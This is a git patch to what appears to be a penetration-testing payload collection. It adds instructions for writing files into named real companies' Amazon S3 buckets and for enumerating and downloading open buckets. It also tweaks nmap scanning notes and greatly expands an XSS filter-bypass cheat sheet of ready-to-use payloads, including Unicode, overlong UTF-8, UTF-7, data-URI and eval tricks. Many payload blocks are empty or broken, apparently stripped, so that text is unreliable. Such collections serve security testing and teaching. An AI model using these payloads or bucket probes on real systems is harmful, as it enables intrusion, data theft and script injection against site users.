From 2829592730b19b863dcb4cf0e6fc468ac205efa0 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Fri, 11 Nov 2016 16:03:35 +0700 Subject: [PATCH] AWS added, XSS and methodology update --- AWS Amazon Bucket S3/README.md | 44 ++++++++++++++++ Methodology_and_enumeration.md | 9 ++-- XSS injection/README.md | 96 ++++++++++++++++++++++++---------- 3 files changed, 116 insertions(+), 33 deletions(-) create mode 100644 AWS Amazon Bucket S3/README.md diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md new file mode 100644 index 0000000..d8c0280 --- /dev/null +++ b/AWS Amazon Bucket S3/README.md @@ -0,0 +1,44 @@ +# Amazon Bucket S3 AWS +By default the name of Amazon Bucket are +``` +http://s3.amazonaws.com/[bucket_name]/ +http://[bucket_name].s3.amazonaws.com/ +``` + +Move a file into the bucket +``` +sudo apt install awscli + +touch test.txt +aws s3 mv test.txt s3://hackerone.marketing +FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied." + +aws s3 mv test.txt s3://hackerone.files +SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" +``` + +Bucket Finder +A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. +``` +wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 +./bucket_finder.rb my_words +./bucket_finder.rb --region ie my_words + US Standard = http://s3.amazonaws.com + Ireland = http://s3-eu-west-1.amazonaws.com + Northern California = http://s3-us-west-1.amazonaws.com + Singapore = http://s3-ap-southeast-1.amazonaws.com + Tokyo = http://s3-ap-northeast-1.amazonaws.com + +./bucket_finder.rb --download --region ie my_words +./bucket_finder.rb --log-file bucket.out my_words +``` +Use a custom wordlist for the bucket finder, can be created with +``` +List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media. +List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart. +``` + + +## Thanks to +* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets +* https://digi.ninja/projects/bucket_finder.php diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 26cd272..c5cf991 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -47,17 +47,14 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git * Basic NMAP (if allowed ^^') ``` -sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 & -sudo nmap -sSV -oA OUTPUTFILE -T4 -iL IPS.csv +sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 +sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports - • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) - • 192.168.0.1 is the IP address to scan - • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" - +• -iL INPUTFILE tells Nmap to use the provided file as inputs • -T4 defines the timing for the task (options are 0-5 and higher is faster) ``` diff --git a/XSS injection/README.md b/XSS injection/README.md index b8043a7..a752bf5 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -91,7 +91,7 @@ DOM XSS #"> ``` -## XSS in wrappers javascript and data +## XSS in wrappers javascript and data URI XSS with javascript: ``` javascript:prompt(1) @@ -103,6 +103,7 @@ javascript:prompt(1) XSS with data: ``` +data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ``` @@ -219,31 +220,56 @@ Polyglot XSS - Rsnake ## Filter Bypass and exotic payloads +Bypass case sensitive +``` + +``` + Bypass quotes for string ``` String.fromCharCode(88,83,83) ``` -Bypass parenthesis for string +Bypass dot filter +``` + - - -< -< - -\"/\"src=\"/\"onerror=eval(id) -String.fromCharCode(88,83,83) - - + ``` -Using Unicode +Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari +``` + +``` + +Bypass space filter with "/" - IE/Firefox/Chrome/Safari +``` + +``` + +Bypass with incomplete html tag - IE/Firefox/Chrome/Safari +``` +window['alert'](0) + + + +``` + +Bypass using Unicode ``` Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was transformed into U+003C LESS­THAN SIGN (<) @@ -266,40 +292,56 @@ transformed into U+0027 APOSTROPHE (') E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ %EF%BC%9E becomes > %EF%BC%9C becomes < +``` -Overlong UTF-8 +Bypass using overlong UTF-8 +``` < = %C0%BC = %E0%80%BC = %F0%80%80%BC > = %C0%BE = %E0%80%BE = %F0%80%80%BE ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 " = %CA%BA ' = %CA%B9 - ``` - -HTTP Parameter Pollution +Bypass using UTF-7 ``` -http://target.com/something.xxx?a=val1&a=val2 -ASP.NET a = val1,val2 -ASP a = val1,val2 -JSP a = val1 -PHP a = val2 ++ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- ``` - - -Use JSFuck to encode the payload (alert()) +Bypass using weird encoding or native interpretation to hide the payload (alert()) ```javascript + + + ``` + + +Exotic payloads +``` +al + + + +< +< + +\"/\"src=\"/\"onerror=eval(id) +String.fromCharCode(88,83,83) + +